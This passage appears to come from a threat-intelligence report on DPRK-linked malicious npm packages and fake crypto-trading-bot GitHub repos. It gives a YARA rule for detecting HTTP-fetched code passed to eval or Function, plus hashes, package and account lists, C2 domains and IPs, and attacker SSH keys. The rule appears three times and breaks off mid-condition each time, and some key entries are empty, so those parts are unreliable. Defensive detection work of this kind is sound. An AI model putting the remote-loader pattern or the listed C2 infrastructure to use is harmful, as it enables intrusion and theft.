        $field_body       = /\\.\\s*body\\s*[\\.\\[]/

    condition:
        filesize < 200KB
        and 1 of ($http_*)
        and 1 of ($dyn_*)
        and 1 of ($field_

rule NPM_Remote_Code_Loader_HTTP_To_Function
{
    meta:
        description = "HTTP response body passed to Function constructor or eval — remote code loader pattern"
        author = "PantherLabs"
        date = "2026-04-16"
        severity = "high"
        campaign = "DPRK / Contagious Trader / OtterCookie"

    strings:
        // HTTP-fetch idioms — any one of these
        $http_axios_get   = /await\\s+axios\\s*\\.\\s*(get|post|put|patch|request)\\s*\\(/
        $http_axios_call  = /await\\s+axios\\s*\\(/
        $http_fetch       = /await\\s+fetch\\s*\\(/
        $http_got         = /await\\s+got\\s*(\\.\\s*\\w+\\s*)?\\(/
        $http_node        = /(https?|http2)\\s*\\.\\s*(get|request)\\s*\\(/

        // Dynamic-execution idioms — any one of these
        $dyn_function     = /new\\s+Function\\s*\\(/
        $dyn_fn_ctor      = /new\\s+Function\\s*\\.\\s*constructor\\s*\\(/
        $dyn_eval         = /\\beval\\s*\\(/
        $dyn_vmrun        = /\\bvm\\s*\\.\\s*runIn(This|New)Context\\s*\\(/
        $dyn_vmscript     = /new\\s+vm\\s*\\.\\s*Script\\s*\\(/

        // Reading a `data`/`body`/`config`/`payload` field off something
        // (the link between the HTTP response and the exec call)
        $field_extract    = /\\.\\s*data\\s*[\\.\\[]/
        $field_optchain   = /\\.\\s*data\\s*\\?\\s*\\./
        $field_body       = /\\.\\s*body\\s*[\\.\\[]/

    condition:
        filesize < 200KB
        and 1 of ($http_*)
        and 1 of ($dyn_*)
        and 1 of ($field_

rule NPM_Remote_Code_Loader_HTTP_To_Function
{
    meta:
        description = "HTTP response body passed to Function constructor or eval — remote code loader pattern"
        author = "PantherLabs"
        date = "2026-04-16"
        severity = "high"
        campaign = "DPRK / Contagious Trader / OtterCookie"

    strings:
        // HTTP-fetch idioms — any one of these
        $http_axios_get   = /await\\s+axios\\s*\\.\\s*(get|post|put|patch|request)\\s*\\(/
        $http_axios_call  = /await\\s+axios\\s*\\(/
        $http_fetch       = /await\\s+fetch\\s*\\(/
        $http_got         = /await\\s+got\\s*(\\.\\s*\\w+\\s*)?\\(/
        $http_node        = /(https?|http2)\\s*\\.\\s*(get|request)\\s*\\(/

        // Dynamic-execution idioms — any one of these
        $dyn_function     = /new\\s+Function\\s*\\(/
        $dyn_fn_ctor      = /new\\s+Function\\s*\\.\\s*constructor\\s*\\(/
        $dyn_eval         = /\\beval\\s*\\(/
        $dyn_vmrun        = /\\bvm\\s*\\.\\s*runIn(This|New)Context\\s*\\(/
        $dyn_vmscript     = /new\\s+vm\\s*\\.\\s*Script\\s*\\(/

        // Reading a `data`/`body`/`config`/`payload` field off something
        // (the link between the HTTP response and the exec call)
        $field_extract    = /\\.\\s*data\\s*[\\.\\[]/
        $field_optchain   = /\\.\\s*data\\s*\\?\\s*\\./
        $field_body       = /\\.\\s*body\\s*[\\.\\[]/

    condition:
        filesize < 200KB
        and 1 of ($http_*)
        and 1 of ($dyn_*)
        and 1 of ($field_

IoCs

Hashes

SHA256	Name	Note
`7465382403e61ba1e96a6b9b700cb7d06a2cf802f7079ff0a7f859d751adc45a`	prettier-resolver-1.1.5.tgz	npm tarball (kunwarshivam1971)
`9988632cd76dcb448e673daf6b97e78225fe0613fe4268b971cbd5bd29b0ba8b`	cdll.mjs	ClipViper sample
`a08c089ed46447cd901bbd9031f1931337afe42bb8af70299195d5f9b11c69fb`	cdll-run-hidden.vbs	VBScript launcher
`36abee6d79f8b135d1b03540dcbde1fb2eb1abba7ea5bf59ecb342730c415519`	cdll.xml	Task Scheduler XML definition
`d00aa3cbd7ad80b72cc5df665a7377c72981ba116b486e6c34b81896be0e4124`	ctll.mjs	ClipViper Dropper

DPRK-attributed NPM Malicious Packages

Package	Version(s)	npm Account	Email	Cluster
api-node-utils	2.2.4	ffffrakyevin	frankykevin.dev[@]gmail[.]com	PromptMink
api-ts-utils	1.0.0-2.1.4	ffffrakyevin	frankykevin.dev[@]gmail[.]com	ClipViper
api-ts-utils	3.x (3.4.9, 3.5.9)	ffffrakyevin	frankykevin.dev[@]gmail[.]com	PromptMink
typescript-util-core	3.5.0-7.1.6	ffffrakyevin	frankykevin.dev[@]gmail[.]com	PromptMink
prettier-resolver	1.1.5-1.2.2	kunwarshivam1971	kunwarshivam1971[@]hotmail[.]com	ClipViper
web-http-errors	1.3.3, 4.5.1	kunwarshivam1971	kunwarshivam1971[@]hotmail[.]com	ClipViper
http-errors-cli	1.3.1	kunwarshivam1971	kunwarshivam1971[@]hotmail[.]com	ClipViper
bn-eslint.js	8.0.5	amauri_jesus	cashblaze1001[@]gmail[.]com	PromptMink
npm-eslint-helper	1.0.1	amauri_jesus	cashblaze1001[@]gmail[.]com	PromptMink
classnames-sub-folk	1.0.0, 3.5.2	danlo00holoden	cashblaze0510[@]gmail[.]com	ClipViper
result-type-tool	2.8.3	danlo00holoden	cashblaze0510[@]gmail[.]com	ClipViper (depends on classnames-sub-folk)
prettier-logger	0.1.5-0.1.6	aleksislabs	aleksis2026dev[@]outlook[.]com	PromptMink
polymarket-onchain-sdk	1.0.3-1.0.4	aleksislabs	aleksis2026dev[@]outlook[.]com	PromptMink
polymarket-onchain-plugin	2.1.4	maklionelox	maklionelox[@]gmail[.]com	PromptMink
picocolor-logger	1.0.0-1.0.2	lorine93s	milosk920125[@]gmail[.]com	PromptMink
sleek-pretty	1.0.0	lorine93s	milosk920125[@]gmail[.]com	PromptMink
pinky-logger	1.0.0	lorine93s	milosk920125[@]gmail[.]com	PromptMink
chalks-logger	1.1.0-1.1.3	lorine93s	milosk920125[@]gmail[.]com	PromptMink
chalk-pro-logger	1.1.1-1.1.2	lorine93s	milosk920125[@]gmail[.]com	PromptMink
emojiprint-logger	1.1.0	lorine93s	milosk920125[@]gmail[.]com	PromptMink
chalki-pretty	1.0.0	lorine93s	milosk920125[@]gmail[.]com	PromptMink
styled-text-logger	1.3.1	npmpodev0707	diwatkins1971k[@]gmail[.]com	PromptMink
color-logger-console	3.1.8-3.1.9	devking1616	podev75926[@]gmail[.]com	PromptMink
lint-builder-logger	1.0.4	alberto1114	super1114dev[@]gmail[.]com	OtterCookie
ts-big-lib	1.3.4	alberto1114	super1114dev[@]gmail[.]com	OtterCookie
levex-press	1.0.5	alberto1114	super1114dev[@]gmail[.]com	OtterCookie
awesome-cli-builders	1.0.0	jofarc	jofarc789[@]gmail[.]com	OtterCookie
awesome-cli-logger	1.0.0	jofarc	jofarc789[@]gmail[.]com	OtterCookie
rjs-biginteger	2.0.1	jofarc	jofarc789[@]gmail[.]com	PromptMink
npm-doc-dev	1.0.4-1.1.1	rafinhossian	rafinhossianlove[@]gmail[.]com	PromptMink
big256-ts	5.0.4	rafinhossian	rafinhossianlove[@]gmail[.]com	PromptMink
ts-relayer-pub	1.0.0	y.rix.elfi.e.co	y.rix.elfi.e.co[@]gmail[.]com	PromptMink
npm-builders	1.0.8	digoschristiann	di.gos.c.hristia.n.n[@]googlemail[.]com	OtterCookie
ts-lint-builder	1.0.8-1.0.9	digoschristiann	di.gos.c.hristia.n.n[@]googlemail[.]com	OtterCookie
ts-lint-builds	1.0.5	ca.r.lane.es1.2.6	ca.r.lane.es1.2.6[@]googlemail[.]com	OtterCookie
npm-doc-builder	1.0.7	al.lanjaysa.t.i.a.gi	al.lanjaysa.t.i.a.gi[@]gmail[.]com	OtterCookie
pino-pretty-logger	1.0.8	soju_dev	haraldosman.ho[@]gmail[.]com	PromptMink
logger-beauty	2.1.1	cryptopawsol	cryptopawsol[@]gmail[.]com	PromptMink
ts-moduler	1.0.5	moduler	cobily11[@]gmail[.]com	PromptMink
ts-logger-pack	1.1.2	jpeek886	jpeek886[@]gmail[.]com	PromptMink
terminal-logger-pack	0.1.0-1.1.1	jpeek895	jpeek895[@]gmail[.]com	PromptMink
pino-utils	1.4.0	satyasu8	satyasumn8[@]gmail[.]com	PromptMink (SSH key = npmpodev0707)
@tsjunk/chalk	5.6.2	mod_triler	N/A	PromptMink
@etherprojects/logger	5.8.1	michale127	N/A	PromptMink
changelog-utils-wrapper	1.0.0	chirag_nikolic	chiragnikolic[@]gmail[.]com	PromptMink (ReversingLabs)
ts-bing	1.3.1	v.al.s.o.lo.mon7.0	v.al.s.o.lo.mon7.0[@]gmail[.]com	PromptMink (C2 = y.rix.elfi.e.co)
vime-azl	1.1.4	v.al.s.o.lo.mon7.0	v.al.s.o.lo.mon7.0[@]gmail[.]com	PromptMink (payload for ts-bing)
ts-utils-dev	1.3.2	jamesjamesjmaes123	al.la.n.h.o.rca07[@]gmail[.]com	PromptMink (big.js typosquat)
gleb-js	1.2.0	jamesjamesjmaes123	al.la.n.h.o.rca07[@]gmail[.]com	PromptMink (payload for ts-utils-dev)
bigint.os	5.0.5	a.yal.a.da.ve7	a.yal.a.da.ve7[@]gmail[.]com	OtterCookie (big.js typosquat)
lint-null	1.0.4	a.yal.a.da.ve7	a.yal.a.da.ve7[@]gmail[.]com	OtterCookie (payload for bigint.os)
mjs-biginteger	5.0.5	n.ar.a.tat.ia.n.aaa	n.ar.a.tat.ia.n.aaa[@]gmail[.]com	OtterCookie (big-integer typosquat)
ts-lint-builders	1.0.5	n.ar.a.tat.ia.n.aaa	n.ar.a.tat.ia.n.aaa[@]gmail[.]com	OtterCookie (payload for mjs-biginteger)
st-bigintr	5.0.6	a.n.n.as.ibal2.36	a.n.n.as.ibal2.36[@]googlemail[.]com	OtterCookie (paired with sjs-builder. Payload hash bcfb01ee... shared with mjs-biginteger + cjs-biginteger)
cjs-biginteger	5.0.3-5.0.5	ca.r.lane.es1.2.6	ca.r.lane.es1.2.6[@]googlemail[.]com	OtterCookie (payload hash bcfb01ee... shared with st-bigintr + mjs-biginteger)
sjs-builders	1.0.4	ayal.a.d.av.e.7	ayal.a.d.av.e.7[@]gmail[.]com	OtterCookie (dotted-name actor, near-identical username to `a.yal.a.da.ve7`)
st-biginteger	5.0.5	ayal.a.d.av.e.7	ayal.a.d.av.e.7[@]gmail[.]com	OtterCookie (big-integer typosquat, not in prior reporting)
bjs-lint-builders	1.0.4	a.l.l.a.nh.orca0.7	a.l.l.a.nh.orca0.7[@]googlemail[.]com	OtterCookie
sjs-builder	1.0.4	`a.n.n.as.ibal2.36`	`a.n.n.as.ibal2.36`[@]googlemail[.]com	OtterCookie
pretty-fancy	1.0.0-1.0.5	npm_kei	N/A	PromptMink
pretty-pino-logger	1.0.0-2.0.2	npm_kei	N/A	PromptMink
js-tree-integer	1.0.0, 2.6.3, 2.6.7	amauri_jesus	cashblaze1001[@]gmail[.]com	OtterCookie
js-integer-log	1.0.0, 3.6.1	amauri_jesus	cashblaze1001[@]gmail[.]com	OtterCookie

DPRK-attributed GitHub Repos

Repo	GitHub User/Org	Theme	Malicious import	Cluster
/polymarket-trading-bot	CashBlazorLab	Polymarket	bn-eslint.js + web-http-errors	PromptMink + ClipViper
/polymarket-trading-bot	XHYhappy	Polymarket	bn-eslint.js	PromptMink
/polymarket-copy-trading-bot	XHYhappy	Polymarket	bn-eslint.js	PromptMink
/polymarket-ai-trading-bot	XHYhappy	Polymarket	bn-eslint.js	PromptMink
/polymarket-kalshi-arbitrage-bot-15min-market	XHYhappy	Polymarket	bn-eslint.js	PromptMink
/polymarket-copy-trading-bot	Symotix	Polymarket	bn-eslint.js	PromptMink
/polymarket-kalshi-arbitrage-bot-15min-market	syahrayhan	Polymarket	bn-eslint.js	PromptMink
/polymarket-kalshi-arbitrage-bot-15min-market	Krypto-Hashers-Community	Polymarket	bn-eslint.js	PromptMink
/polymarket-arbitrage-trading-bot	legit-script-group	Polymarket	bn-eslint.js	PromptMink
/polymarket-arbitrage-bot	polkadot-org	Polymarket	bn-eslint.js	PromptMink
/polymarket-ai-trading-bot	polkadot-org	Polymarket	bn-eslint.js	PromptMink
/polymarket-finance-bot	polkadot-org	Polymarket	bn-eslint.js	PromptMink
/polymarket-politics-bot	polkadot-org	Polymarket	bn-eslint.js	PromptMink
/pancakeswap-prediction-bot	madewithai	PancakeSwap	bn-eslint.js	PromptMink
/pumpfun-mayhem-trading-bot	gigi0500	PumpFun	bn-eslint.js	PromptMink
/pumpfun-mayhem-ai-trading-bot	gigi0500	PumpFun	bn-eslint.js	PromptMink
/pumpfun-mayhem-copy-trading-bot	gigi0500	PumpFun	bn-eslint.js	PromptMink
/pumpfun-mayhem-volume-bot	gigi0500	PumpFun	bn-eslint.js	PromptMink
/pumpfun-mayhem-bundler-bot	gigi0500	PumpFun	bn-eslint.js	PromptMink
/pumpfun-mayhem-migration-sniper	gigi0500	PumpFun	bn-eslint.js	PromptMink
/Polymarket-Arbitrage-Crypto-Trading-Bot-V3	0xFives	Polymarket	polymarket-onchain-sdk	PromptMink
/Pumpfun-Volume-Bot	0xFives	PumpFun	prettier-logger	PromptMink
/Raydium-Cpmm-Sniper	0xFives	Solana	prettier-logger	PromptMink
/openclaw-ai-polymarket-trading-bot	solcanine	Polymarket	logger-beauty	PromptMink
/polymarket-impulse-monitoring-trading-bot	solcanine	Polymarket	logger-beauty	PromptMink
/Polymarket-Sports-Bot	GastonDeMichele	Polymarket	color-logger-console	PromptMink
/Polymarket-Copytrading-Bot	PoDev-rahulrajasekhar	Polymarket	color-logger-console	PromptMink
/polymarket-copy-trade-bot	djosk23	Polymarket	bigint.os + sjs-builder	OtterCookie
/polymarket-trading-bot-example	LacaveSeb	Polymarket	mjs-biginteger	OtterCookie
/chain-fetcher-hub	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/system-lab-5857	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/data-services	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/stack-runtime	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/infra-pipeline-lab	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/sync-batch-lab-5312	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/hub-suite	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/gateway-stack-5812	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/system-runtime	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/sync-core	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/service-core	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/stack-system	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/engine-core	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/bridge-core	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/index-lab	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/flux-kit	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/prime-services	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/data-pipeline-system-4275	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/sync-stack	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/prime-core	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/data-stream-lab-1839	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/meta-runtime-lab	Chain-Ether-Core	Polymarket	web-http-errors	ClipViper
/flux-relay-stack	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/core-hub-stack	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/infra-service-system	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/worker-hub-2619	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/core-lab-7000	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/runtime-kit	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/pipeline-system	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/fetcher-core	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/flux-batch-stack	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/system-hub-core-536	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/index-services-2599	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/dev-platform-4287	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/infra-index-kit	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/stack-fetcher-lab	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/relay-suite	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/prime-pipeline-system-8633	Infranova-Labs	Polymarket	web-http-errors	ClipViper
/prime-suite	Cryptonerva	Polymarket	web-http-errors	ClipViper
/system-services	Cryptonerva	Polymarket	web-http-errors	ClipViper
/polymarket-arbitrage	amplify-protocol	Polymarket	api-ts-utils	PromptMink
/polymarket-arbitrage	TQ-trade	Polymarket	api-ts-utils	PromptMink
/polymarket-copy-trading-bot	Predictional-Infra	Polymarket	big256-ts	PromptMink
/polymarket-trading-bot	tradebothub	Polymarket	ts-moduler	PromptMink
/polymarket-copy-trading-bot	G3-DEV-AGENCY	Polymarket	ts-big-lib	OtterCookie
/polymarket-copytrading-bot	G3-DEV-AGENCY	Polymarket	ts-big-lib	OtterCookie
/polymarket-arbitrage-bot	zkOSAI	Polymarket	ts-big-lib	OtterCookie
/polymarket-trading-bot	soldrift	Polymarket	ts-logger-pack	PromptMink
/polymarket-copy-trading-bot	Valentioo	Polymarket	ts-logger-pack	PromptMink
/Sol-marketplace	machenxi	Solana	chalks-logger	PromptMink
/Polymarket-Trading-Bot-Gabagool	satyasumn7	Polymarket	pino-utils	PromptMink
/polymarket-sports-betting-bot	AlgoInfraTech	Polymarket	sleek-pretty	PromptMink
/polymarket-trading-bot	AlgoInfraTech	Polymarket	@tsjunk/chalk	PromptMink
/polymarket-trading-bot-copytrading	ScouterInfinite	Polymarket	@etherprojects/logger	PromptMink
/Polymarket-Arbitrage-Crypto-Trading-Bot	emmarktech	Polymarket	polymarket-onchain-plugin	PromptMink
/1776507753199	alpaca-project	Polymarket	ts-bing	PromptMink
/evm-arbitrage-bot	BNB-Alpha-Community	EVM	ts-bing	PromptMink
/polymarket-trading-bot	alexandrosmagos	Polymarket	ts-utils-dev	PromptMink
/polymarket-btc-5min-15min-arbitrage-bot	lorine93s	Polymarket	chalks-logger, emojiprint-logger	PromptMink
/polymarket-copy-trading-bot	lorine93s	Polymarket	chalks-logger	PromptMink
/Pumpfun_AI_Trading_Bot	Jackhuang166	PumpFun	chalks-logger	PromptMink
/hyberliquid-arbitrage-bot	Jackhuang166	Hyperliquid	chalks-logger	PromptMink
/Ethical-GenAI-Framework	praneethreddyy14	Polymarket	bn-eslint.js	PromptMink
/Polymarket-Arbitrage-Trading-Bot	Matias123p	Polymarket	changelog-utils-wrapper	PromptMink
/polymarket-arbitrage-trading-bot	Runtime-Trade-Systems	Polymarket	@tsjunk/chalk	PromptMink
/polymarket-copy-trading-bot	benja-dev-lab	Polymarket	@tsjunk/chalk	PromptMink
/polymarket-btc-5min-15min-arbitrage-trading-bot	lorine93s	Polymarket	emojiprint-logger	PromptMink
/Polymarket-Arbitrage-Crypto-Trading-Bot	AdrianNavaG	Polymarket	polymarket-onchain-sdk	PromptMink
/Polymarket-Arbitrage-Trading-Bot-Spreadmaker	Corettafinnougricspeaking368	Polymarket	pretty-fancy	PromptMink
/polymarket-copytrade	mclaeo	Polymarket	api-ts-utils	PromptMink
/polymarket-arbitrage	mclaeo	Polymarket	api-ts-utils	PromptMink
/polymarket-copytrade	rybirdwell	Polymarket	api-ts-utils	PromptMink
/polymarketarbitrage	rybirdwell	Polymarket	api-ts-utils	PromptMink
/polymarket-copytrade	Dougthethugg	Polymarket	api-ts-utils	PromptMink
/polymarketarbitrage	Dougthethugg	Polymarket	api-ts-utils	PromptMink
/polymarket-copytrade	gisel69	Polymarket	api-ts-utils	PromptMink
/polymarketarbitrage	gisel69	Polymarket	api-ts-utils	PromptMink
/polymarket-copytrade	kyyook	Polymarket	api-ts-utils	PromptMink
/polymarketarbitrage	kyyook	Polymarket	api-ts-utils	PromptMink
/polymarket-arbitrage-bot	JoTalksdxb	Polymarket	cjs-biginteger	OtterCookie
/polymarket-arbitrage/	JeanDupuis68	Polymarket	api-ts-utils	PromptMink
/polymarket-copytrade	JeanDupuis68	Polymarket	api-ts-utils	PromptMink
/prediction-market-copytrade	SXai-lab	Polymarket	api-ts-utils	PromptMink
/prediction-market-arbitrage	SXai-lab	Polymarket	api-ts-utils	PromptMink

C2	Actor	Notes
nonce-link[.]vercel[.]app	ffffrakyevin, kunwarshivam1971, danlo00holoden	Shared clipboard stealer C2
mono-link[.]vercel[.]app	ffffrakyevin	api-ts-utils v1-2.1.3
polymarkettrading[.]vercel[.]app	ffffrakyevin	KMSec confirmed, api-node-utils
eslint-helper[.]vercel[.]app	amauri_jesus	File exfil C2 for npm-eslint-helper (confirmed from source)
eslint-config[.]vercel[.]app	amauri_jesus	Possible C2 rotation or alternate endpoint
170.205.31[.]203	ffffrakyevin	AS206216 Advin Services LLC, typescript-util-core
api.fivefingerz[.]dev	aleksislabs	prettier-logger SSH backdoor + infostealer
polymarket-clob2[.]blog	lorine93s	Primary C2, A/B rotated with Vercel backend
polymarket-bots-backend[.]vercel[.]app	lorine93s	KMSec watchlist
api.mywalletsss[.]store	lorine93s	OTX confirmed DPRK / Contagious Trader
clob-polymarket[.]com	npmpodev0707	OTX confirmed DPRK / Contagious Trader
color-picker[.]live	devking1616	KMSec confirmed, socket.io transport
cloudflareinsights[.]vercel[.]app	alberto1114, digoschristiann, al.lanjaysa.t.i.a.gi	OtterCookie C2. SSH key + scan-pattern config server. See OtterCookie report for full infrastructure mapping.
wallet-management-tg-bot[.]vercel[.]app	alberto1114	OtterCookie C2. lint-builder-logger from_str_1() file exfil
208.84.100[.]22	alberto1114	OtterCookie bare-IP C2. levex-press v1.0.5, ports 3000 (exfil) / 3001 (config + SSH key). Same /api/v1, /api/ssh-key, /api/scan-patterns, /api/block-patterns endpoint structure as Vercel C2.
polybot-management-v1[.]vercel[.]app	jofarc	awesome-cli-builders, published 2026-05-05
polybot-management-v2[.]vercel[.]app	jofarc	awesome-cli-builders, published 2026-05-05
polymarket-api-v2[.]vercel[.]app	rafinhossian	npm-doc-dev file exfil
polymarket-cli-v2[.]vercel[.]app	rafinhossian	npm-doc-dev SSH key fetch
cloudflare-protection[.]vercel[.]app	y.rix.elfi.e.co	ts-relayer-pub, new actor
clob[.]0xundying[.]dev	soju_dev	pino-pretty-logger, new actor
api.devnet.solana[.]com	a.n.n.as.ibal2.36	Solana devnet API abused as C2 staging/exfil. OtterCookie cluster.
https[:]//huggingface[.]co/Lordplay/system-releases/resolve/main/	jpeek895	PromptMink cluster
https[:]//logger[.]clob[.]health	npm_kei	PromptMink cluster
blxrbn[.]com	npm_kei	PromptMink cluster
204[.]10[.]194[.]64	amauri_jesus	OtterCookie

SSH Keys

Key 1, lorine93s (picocolor-logger, pinky-logger, chalki-pretty, emojiprint-logger, chalks-logger v1.1.3):

Key 2, lorine93s (chalks-logger v1.1.0-1.1.1, chalk-pro-logger v1.1.1):

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwzFmTsUVxphkQy4Ua6bEeBGqtWCX9VJpXG8Q1Y6TMI polymarkeths@gmail[.]

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwzFmTsUVxphkQy4Ua6bEeBGqtWCX9VJpXG8Q1Y6TMI polymarkeths@gmail[.]

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwzFmTsUVxphkQy4Ua6bEeBGqtWCX9VJpXG8Q1Y6TMI polymarkeths@gmail[.]

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDwzFmTsUVxphkQy4Ua6bEeBGqtWCX9VJpXG8Q1Y6TMI polymarkeths@gmail[.]

Key 3, npmpodev0707 (styled-text-logger):

Key 4, devking1616 (color-logger-console):

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDmWnP8URefTNSLWC1Vkh9lY7YRrm2zXW9TkyMf5tvvxKzNbcuHbT4gBDD5GzqAAeaD4rqvaTj2Fn52pB6gu1RTopSIO6LyLnCWOSeCFNKLVwGXFGczNt8zkYxIvWMe0ls8ox5QhDNiaTr4MV03MjIi+zpvNbz8Hbh5LposliFAO6hq/EJCfcbDbfMtHXx06pMFr1jCffKHYcN8OctgAWacG4w/M62NjsSUpW7MC5uN19IBGWM4/W6+JD4O9CMOHRoGcElzGfOQZlsAd6WxJExBDhIrL8ko+5TGKAn5+UkbY+I8LZgbg+LlxsunVJqofH3Sz0u8YDf0f7iXJBcNqOhOXT8Pny9wC5Q3ho4PpsNbPAhIqE3YD+WD4bXXlIF4E/5WkGFx/vocxHrZboJmxkL6PZE36VWR1sNaf3plwwR7hhdTbxDtsBV+M74bixysGw37f9h+j3hhr3VV+pGMWTk14S/6jLmDlSj0YJaXWOk7CrKHcl4hN2obM75SZxh/Zegd2N1rM3Rz6ea33hl1re4tNOAErCMqMx65JmYdmC3MeAIBhZIWf9K/IyFs2nwrOywNcnH+2EQVn4T3+SP/RXvO/xr6R49xg2XMYrrq/Q+KeEUvrxz7M+NRxviYPpg0mNlqbEmwca5kflt1zOMhMJ/JQuKZ+ofgx5S494RcPXHiBw== advin

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDmWnP8URefTNSLWC1Vkh9lY7YRrm2zXW9TkyMf5tvvxKzNbcuHbT4gBDD5GzqAAeaD4rqvaTj2Fn52pB6gu1RTopSIO6LyLnCWOSeCFNKLVwGXFGczNt8zkYxIvWMe0ls8ox5QhDNiaTr4MV03MjIi+zpvNbz8Hbh5LposliFAO6hq/EJCfcbDbfMtHXx06pMFr1jCffKHYcN8OctgAWacG4w/M62NjsSUpW7MC5uN19IBGWM4/W6+JD4O9CMOHRoGcElzGfOQZlsAd6WxJExBDhIrL8ko+5TGKAn5+UkbY+I8LZgbg+LlxsunVJqofH3Sz0u8YDf0f7iXJBcNqOhOXT8Pny9wC5Q3ho4PpsNbPAhIqE3YD+WD4bXXlIF4E/5WkGFx/vocxHrZboJmxkL6PZE36VWR1sNaf3plwwR7hhdTbxDtsBV+M74bixysGw37f9h+j3hhr3VV+pGMWTk14S/6jLmDlSj0YJaXWOk7CrKHcl4hN2obM75SZxh/Zegd2N1rM3Rz6ea33hl1re4tNOAErCMqMx65JmYdmC3MeAIBhZIWf9K/IyFs2nwrOywNcnH+2EQVn4T3+SP/RXvO/xr6R49xg2XMYrrq/Q+KeEUvrxz7M+NRxviYPpg0mNlqbEmwca5kflt1zOMhMJ/JQuKZ+ofgx5S494RcPXHiBw== advin

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDmWnP8URefTNSLWC1Vkh9lY7YRrm2zXW9TkyMf5tvvxKzNbcuHbT4gBDD5GzqAAeaD4rqvaTj2Fn52pB6gu1RTopSIO6LyLnCWOSeCFNKLVwGXFGczNt8zkYxIvWMe0ls8ox5QhDNiaTr4MV03MjIi+zpvNbz8Hbh5LposliFAO6hq/EJCfcbDbfMtHXx06pMFr1jCffKHYcN8OctgAWacG4w/M62NjsSUpW7MC5uN19IBGWM4/W6+JD4O9CMOHRoGcElzGfOQZlsAd6WxJExBDhIrL8ko+5TGKAn5+UkbY+I8LZgbg+LlxsunVJqofH3Sz0u8YDf0f7iXJBcNqOhOXT8Pny9wC5Q3ho4PpsNbPAhIqE3YD+WD4bXXlIF4E/5WkGFx/vocxHrZboJmxkL6PZE36VWR1sNaf3plwwR7hhdTbxDtsBV+M74bixysGw37f9h+j3hhr3VV+pGMWTk14S/6jLmDlSj0YJaXWOk7CrKHcl4hN2obM75SZxh/Zegd2N1rM3Rz6ea33hl1re4tNOAErCMqMx65JmYdmC3MeAIBhZIWf9K/IyFs2nwrOywNcnH+2EQVn4T3+SP/RXvO/xr6R49xg2XMYrrq/Q+KeEUvrxz7M+NRxviYPpg0mNlqbEmwca5kflt1zOMhMJ/JQuKZ+ofgx5S494RcPXHiBw== advin

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDmWnP8URefTNSLWC1Vkh9lY7YRrm2zXW9TkyMf5tvvxKzNbcuHbT4gBDD5GzqAAeaD4rqvaTj2Fn52pB6gu1RTopSIO6LyLnCWOSeCFNKLVwGXFGczNt8zkYxIvWMe0ls8ox5QhDNiaTr4MV03MjIi+zpvNbz8Hbh5LposliFAO6hq/EJCfcbDbfMtHXx06pMFr1jCffKHYcN8OctgAWacG4w/M62NjsSUpW7MC5uN19IBGWM4/W6+JD4O9CMOHRoGcElzGfOQZlsAd6WxJExBDhIrL8ko+5TGKAn5+UkbY+I8LZgbg+LlxsunVJqofH3Sz0u8YDf0f7iXJBcNqOhOXT8Pny9wC5Q3ho4PpsNbPAhIqE3YD+WD4bXXlIF4E/5WkGFx/vocxHrZboJmxkL6PZE36VWR1sNaf3plwwR7hhdTbxDtsBV+M74bixysGw37f9h+j3hhr3VV+pGMWTk14S/6jLmDlSj0YJaXWOk7CrKHcl4hN2obM75SZxh/Zegd2N1rM3Rz6ea33hl1re4tNOAErCMqMx65JmYdmC3MeAIBhZIWf9K/IyFs2nwrOywNcnH+2EQVn4T3+SP/RXvO/xr6R49xg2XMYrrq/Q+KeEUvrxz7M+NRxviYPpg0mNlqbEmwca5kflt1zOMhMJ/JQuKZ+ofgx5S494RcPXHiBw== advin

Key 5, soju_dev (pino-pretty-logger):

